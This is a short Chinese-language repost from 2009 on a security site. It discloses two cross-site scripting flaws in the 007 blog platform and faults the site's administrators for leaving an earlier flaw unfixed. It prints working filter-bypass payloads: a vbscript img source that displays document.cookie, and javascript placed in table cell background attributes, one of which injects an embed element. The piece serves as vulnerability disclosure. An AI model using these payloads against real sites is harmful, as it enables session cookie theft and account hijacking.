频道栏目
首页 > 安全 > 网站安全 > 正文

007博客网再暴XSS漏洞

2009-08-07 23:41:12           
收藏   我要投稿

龍影 (KIK网络联盟)  转载请注明出自红黑联盟(www.7747.net)

007博客网再次暴出XSS漏洞 本以为上一个XSS漏洞 已经修补

谁知道上个漏洞仍然存在 这时才明白管理员不会修补漏洞 只是

把修改模板的权限修改了以下 这个并不能解决问题 只要天天登陆博客

注册用户就会升级到所允许修改模板的等级 希望官方尽快想办法解决这个漏洞

我们来看这次的两个XSS漏洞

1.漏洞成因:管理员忽略了过滤vbscript,因此造成了一个非常严重的跨站漏洞的出现

示例:<img src="vbscript:msgbox(&quot;xss&quot;)" />

<img src="vbscript:msgbox(document.cookie)" />


---------------------------------------------------------------------------------------------------------------------------------------------

2.漏洞成因:我们知道对于backgroud样式属性是需要嵌套url才能引用XSS代码的,如果直接把代码写进backgroud是不能运行的,因为缺少了一个触发机制。而table标签会自动加载内部内容——相当与eval。(如果你上一个比较慢的空间,并且整个空间只有一个table,那么你会发现直到整个table数据全部下载到本地才能显示网页内容,原因即是如此)

示例:<table><tr><td background="javascript:alert(/xss/)"></tr></table>

<table >
<tr >
<td background="javascript:TheId.innerHTML=%22&lt;embed src="/URL" height width &gt;%22" >sth or noting</td >
</tr >
</table >

相关TAG标签 漏洞 博客网
上一篇:Rongsoft Oday 批量拿SHELL
下一篇:DVbbs 8.2后台暴目录文件漏洞
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站